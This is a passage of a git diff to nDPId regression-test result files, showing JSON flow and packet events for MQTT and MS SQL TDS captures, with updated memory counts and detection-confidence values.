00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1643014349216} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870764 bytes -~~ total memory freed........: 5870764 bytes -~~ total allocations/frees...: 118127/118127 +~~ total memory allocated....: 6004398 bytes +~~ total memory freed........: 6004398 bytes +~~ total allocations/frees...: 120889/120889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 857 chars diff --git a/test/results/mssql_tds.pcap.out b/test/results/mssql_tds.pcap.out index 78c4cca94..8e3220b8e 100644 --- a/test/results/mssql_tds.pcap.out +++ b/test/results/mssql_tds.pcap.out 
@@ -2,61 +2,61 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1240877917888} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 
00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":874,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1259762400004} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"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"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 
00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7580000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7580000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\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"} 
02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\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"} 02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHc
AIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
